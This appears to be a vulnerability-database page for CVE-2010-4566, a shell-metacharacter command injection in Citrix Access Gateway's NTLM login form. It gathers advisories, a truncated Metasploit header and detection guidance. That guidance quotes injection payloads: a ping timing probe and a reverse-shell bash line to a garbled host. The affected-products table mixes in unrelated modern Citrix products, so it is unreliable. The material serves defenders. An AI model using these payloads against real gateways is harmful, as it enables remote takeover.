CVE-2010-4566
published 2011-01-14CVE-2010-4566: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication…
PriorityP274critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
27.79%
97.8th percentile
The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication component in Access Gateway Standard and Advanced Editions before Access Gateway 5.0, allows attackers to execute arbitrary commands via shell metacharacters in the password field.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | access_gateway | <= 9.2-49.8 | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | citrix_adm | — | — |
| citrix | citrix_hypervisor | — | — |
| citrix | citrix_virtual_apps_and_desktops | — | — |
| citrix | endpoint_management | — | — |
| citrix | netscaler_adc | — | — |
| citrix | netscaler_gateway | — | — |
| citrix | xenserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect shell metacharacter injection in the password field of the web authentication POST request. Look for pipe characters ('|') or ampersands ('&') in the password parameter submitted to the login endpoint. ↗
- →Monitor for the POST body pattern containing 'SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit' as a signature of exploit module activity against the Citrix Access Gateway login endpoint. ↗
- →Detect timing-based probing: an attacker may inject '| ping -c 10 127.0.0.1' into the password field, causing a ~10-second delay in the authentication response that can be used as a vulnerability check. ↗
- →Monitor process execution on the Access Gateway for 'sh -c /usr/local/samba/bin/samedit' spawned by the ntlm_authenticator process, especially with unusual or injected arguments. ↗
- →Alert on outbound TCP connections from the Access Gateway process (vpnadmin) to unexpected external hosts, which may indicate a reverse bash shell established via the injected payload '| bash -i >& /dev/tcp/>/> 0>&1 &'. ↗
- ·The vulnerability is only exploitable when the legacy NT4/NTLM authentication module (ntlm_authenticator) is enabled. Deployments not using this authentication type are not affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Citrix
CVE-2010-4566: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authent
vendor_citrix·2011-01-14·CVSS 9.3
CVE-2010-4566 [CRITICAL] CVE-2010-4566: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authent
CVE-2010-4566: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication component in Access Gateway Standard and Advanced Editions before Access Gateway 5.0, allows attackers to execute arbitrary commands via shell metacharacters in the password field.
Citrix
Citrix Security Bulletin CTX127613
vendor_citrix·CVSS 9.3
CVE-2010-4566 [CRITICAL] Citrix Security Bulletin CTX127613
Citrix Security Bulletin CTX127613
CVE References: CVE-2010-4566, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
GHSA
GHSA-9p2p-8259-272j: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9
ghsa_unreviewed·2022-05-17
CVE-2010-4566 [HIGH] GHSA-9p2p-8259-272j: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9
The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication component in Access Gateway Standard and Advanced Editions before Access Gateway 5.0, allows attackers to execute arbitrary commands via shell metacharacters in the password field.
No detection rules found.
Exploit-DB
Citrix Access Gateway - Command Execution (Metasploit)
exploitdb·2011-03-03
CVE-2010-4566 Citrix Access Gateway - Command Execution (Metasploit)
Citrix Access Gateway - Command Execution (Metasploit)
---
##
# $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Citrix Access Gateway Command Execution',
'Description' => %q{
The Citrix Access Gateway provides support for multiple authentication types.
When utilizing the external legacy NTLM authentication module known as
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
line utility to verify a user's identity and password. By embedding shell
met
Exploit-DB
Citrix Access Gateway - Command Injection
exploitdb·2010-12-22·CVSS 9.3
CVE-2010-4566 [CRITICAL] Citrix Access Gateway - Command Injection
Citrix Access Gateway - Command Injection
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
VSR Security Advisory
http://www.vsecurity.com/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Citrix Access Gateway Command Injection Vulnerability
Release Date: 2010-12-21
Application: Citrix Access Gateway
Versions: Access Gateway Enterprise Edition (up to 9.2-49.8)
Access Gateway Standard & Advanced Edition (prior to 5.0)
Severity: High
Author: George D. Gal
Vendor Status: Updated Software Released, NT4 Authentication Removed [2]
CVE Candidate: CVE-2010-4566
Reference: http://www.vsecurity.com/resources/advisory/20101221-1/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- -----------
Metasploit
Citrix Access Gateway Command Execution
metasploit
Citrix Access Gateway Command Execution
Citrix Access Gateway Command Execution
The Citrix Access Gateway provides support for multiple authentication types. When utilizing the external legacy NTLM authentication module known as ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password. By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway.
No writeups or analysis indexed.
http://securityreason.com/securityalert/8119http://support.citrix.com/article/CTX127613http://www.exploit-db.com/exploits/16916http://www.osvdb.org/70099http://www.securitytracker.com/id?1024893http://www.vsecurity.com/resources/advisory/20101221-1http://securityreason.com/securityalert/8119http://support.citrix.com/article/CTX127613http://www.exploit-db.com/exploits/16916http://www.osvdb.org/70099http://www.securitytracker.com/id?1024893http://www.vsecurity.com/resources/advisory/20101221-1
2011-01-14
Published